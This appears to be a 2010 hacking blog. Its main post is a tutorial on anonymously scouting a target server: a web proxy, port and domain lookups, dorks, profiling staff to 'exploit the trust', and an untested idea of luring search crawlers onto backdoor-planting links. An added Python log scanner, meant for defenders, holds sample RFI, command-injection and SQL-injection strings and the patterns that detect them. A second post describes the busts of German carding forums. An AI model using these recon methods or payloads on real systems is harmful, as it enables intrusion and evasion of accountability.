Thursday, 3 June 2010

How to hack the server and not get caught

Hi there,
In my first blog post I want to talk about a quick way to

"Hack the Server"

of any given website, using only web-based services available to everybody.
So why would we want to do this?
- It's available from everywhere (libraries, schools, museums ...)
- It's completely anonymous (you can find out a lot without even visiting the site)
- It's quick
- It's clean (leaves no traces in log files)
Note: Please only use these techniques on networks you own or are allowed to pwn.

1) Ensure your own anonymity (at least to some degree).
We will be using Google Translate as our web proxy:
http://translate.google.de/translate?hl=en&sl=de&tl=en&u=wieistmeineip.de

// Of course your request will be logged on Google's servers, but the target server will only see a request from a Google IP address.

2) Find out what's behind the server and domain.
For this we are going to use
http://centralops.net/co/DomainDossier.aspx

It gives us a LOT of info about the domain, plus some basic info about the services running and a traceroute.
// We will get to how to use the collected info later.

After that we will try to find out even more about the services with:
http://ping.eu/port-chk/
Some interesting ports:
SQL: 1433 (MySQL), 5432 (PostgreSQL), 1521 (Oracle)
Remote access: 3389 (Remote Desktop), 22, 23

Alright, we now know a lot about the domain and the server, but if we need to know even more:
http://www.iptools.com/
is THE most complete website for online IP tools.

3) Find out about the web apps.
Well, here it could get tricky for some sites, and this task is slow.
However, it should still be noted.
You could try using Google dorks for that; to save time use blackl.com instead of google.com (this is a real gem: basically it's Google, but without filtering/blocking requests),
plus a list of dorks, OR you use Goolag from the CDC (much faster, however you'll have to download this).

4) Finding out about the people
You can use online people searches:
http://pipl.com/
http://people.yahoo.com/
Social networks:
http://yoname.com/
Metacrawler:
http://www.metacrawler.com/
The best tool for this is Maltego from Paterva (has to be downloaded):
http://www.paterva.com/

With the info about the people you can try to search for forum and newsgroup posts from them, which could contain info about the technology they are using.
Remember: if you target the people, then exploit the trust.

5) Use the info
With the information gathered you can find the actual vulnerabilities:
http://osvdb.org/
http://www.exploit-db.com/
http://www.3xpl01t.com/

6) Exploit the host
This can not really be done without leaving traces in logs, but there are some ways that allow an attacker to perform this task in a very anonymous way!
For example, an attacker could craft a link for placing a backdoor (for example in the case of an RFI, OS command execution or an SQLi) that would, if executed, place a backdoor on the system; that link is then posted somewhere on the net.
Some search robot will pick it up and follow the link; by this the URL is executed by the crawler and the server is owned.
I have never done this or seen a case where it has been used, however I think it's possible to do.
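Step 6 itself admits that the request ends up in the web server's log, which is where a defender catches it. As an added example (not code from the original post), this Python check scans constructed Apache access-log lines for requests whose query values carry the RFI, OS command or SQL injection patterns named above and marks which of them came from search-engine crawlers; the crawler names, patterns and sample lines are my assumptions, not from the post.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed Apache "combined" access-log lines (not real traffic); lines 1 and 4
# are crawler user agents that were lured onto URLs carrying payloads.
SAMPLE_LOG = """\
66.249.66.1 - - [03/Jun/2010:10:12:01 +0200] "GET /index.php?page=http://example.invalid/shell.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.1 - - [03/Jun/2010:10:12:02 +0200] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.51.100.7 - - [03/Jun/2010:10:13:05 +0200] "GET /ping.php?host=127.0.0.1;id HTTP/1.1" 200 77 "-" "Mozilla/5.0"
157.55.39.10 - - [03/Jun/2010:10:14:11 +0200] "GET /news.php?id=1%20UNION%20SELECT%201,2,3 HTTP/1.1" 500 0 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d+) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
CRAWLER_RE = re.compile(r"googlebot|bingbot|msnbot|yandex|baiduspider|slurp", re.I)
# Payload classes the post names (RFI, OS command exec, SQLi) as coarse patterns
# applied to each decoded query-string value; tune them for the app in front of you.
CHECKS = [
    ("rfi", re.compile(r"^(?:https?|ftp)://", re.I)),            # remote file include
    ("cmd", re.compile(r"[;|`]|\$\(")),                            # shell metacharacters
    ("sqli", re.compile(r"\bunion\b.+\bselect\b|'\s*or\s+", re.I)),
]

def query_values(path):
    """Decoded query values, split on '&' only so a ';' inside a value is kept."""
    for pair in urlsplit(path).query.split("&"):
        if pair:
            yield unquote_plus(pair.partition("=")[2])

def analyze_line(line):
    """Finding dict for one log line, or None if nothing suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = []
    for value in query_values(m["path"]):
        for label, pattern in CHECKS:
            if pattern.search(value) and label not in findings:
                findings.append(label)
    if not findings:
        return None
    return {"ip": m["ip"], "path": m["path"], "findings": findings,
            "crawler": bool(CRAWLER_RE.search(m["ua"]))}

def find_injected_requests(log_text):
    """Scan a whole log; crawler hits carrying payloads are the trace this trick leaves."""
    return [f for f in (analyze_line(l) for l in log_text.splitlines()) if f]
```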

Have fun!
More tutorials will follow.

Saturday, 29 May 2010

The case: German Underground Cyber Market

Hi there,
Today I want to talk about the downfalls and rises in the German underground market.
When I started looking at the topic of information security and IT in general,
there was a big forum called "hacksector.cc"; the admin (m0rphin), who started out as a small seller of stolen credit cards, was also a drug addict with very serious health problems.
If you wonder what he looks like:
http://www.youtube.com/watch?v=fCEHgu_Pv9Y
http://www.youtube.com/watch?v=Fk9nFj_E_hA
Right now he's in jail. Why?
Well, not only because of the fraud and internet crime, but also because of drug-related crimes.
In fact he announced in the non-public areas of his forum that he thought he would die and even made jokes about it.

How did he get busted?
Access to his forum was sold for only 700€ by the tech admin; after that, the person who had bought access started selling backups for a high price and so even made money with this. He was motivated by revenge, and since logging wasn't shut off, m0rphin (and several other crew members) got busted.
There was a lot of confusion going on about why, since it reads in German law books that illegally obtained information shall not be used ("fruit of the poisonous tree", as it reads in American law books).
Since they were no law experts but experts in doing bullshit, they didn't understand that in fact it was up to how serious the crime was whether the info is being used or not.
So this means: small fish get away, big ones get busted.

Alright, this was case number 1.

After that happened, a lot of people left the German underground scene;
it was a strong strike against the German underground, especially since people had never before experienced troubles like this.
But there was a new force on its way to becoming the number 1 forum for internet crime.
Its name: "1337-crew".
When I first stumbled across this forum I honestly thought this was a parody forum about the German crime scene.
The posts made by the admin "13speedtest37" were of very poor quality.
At that time he was only known for selling credit card numbers, and as the admin of a small crime forum.
But because it was designed as a marketplace it started growing; speedtest made it possible for everybody to buy and sell on his forum.
And he was stabilising the prices for credit cards; at that time he already made thousands of euros per month as a student.

The bust:
Now I could write a LOT about this.
Since I was very active in the debates about his bust, I could talk about the gomopa scandal and the tons of false info (maybe I'm going to do that later).
But it is way more important to know why Mr. Dominik Baur (aka 13speedtest37) got busted.
He got busted because he went to his own server without a proxy or VPN, so his IP appeared in clear text in the logs.
Why did he do that???
(you may ask)
Well, because he thought he was secure:
he was hosting on a Russian server provided by 2x4.ru, which didn't give out any info about him; his server was (at least he thought that) secure, and the law was on his side, since if the database got into the hands of the German BKA they couldn't use the evidence (he thought).
You see, it was his personal failure of not studying the law, as well as the failure of the 50 other persons that got busted 3 days after the hack.

And why didn't he know about the law?
That is the big question! Why did nobody know that? I think that there were a couple of points that led to this:
1) - There are no real law experts in the underground
2) - The culture in the underground didn't want to hear the truth.
3) - They were not curious enough about "hacksector.cc"'s case
4) - A certain amount of time elapsed between the hack and the bust.
5) - And most important, the BKA didn't want them to know, so they designed their press info in a way that left it open why they got busted.

I don't know if these points are correct, but I think they are.

How did the scene react?
Mixed; one very famous quote is "he was the Hitler of the German underground scene",
others were sad that their idol wasn't present in the underground anymore.
An interesting thing:
The scene recovered very quickly; they had learned from the previous case.
Just like the BKA, which reacted 20 times faster than before, they also recovered 20 times better.

Immediately they started switching to another forum called "carders.cc", which a short time ago got hacked by the same people 1337-crew got hacked by.
But no busts yet, interesting!
We'll see what happens.
So long ...

Wednesday, 26 May 2010

Announcements

Hi there,
Just wanted to tell you what's going to happen on this blog:
I'm going to post interesting ways of doing security stuff as well as news about the cybercrime biz and the IT security industry.
- 1 post per week
- 50% news/biz, 50% tutorials/exploits/tools

If you have suggestions/notes about the blog or the info published here, email me at tfrosted [\at\] googlemail.com.

Tuesday, 25 May 2010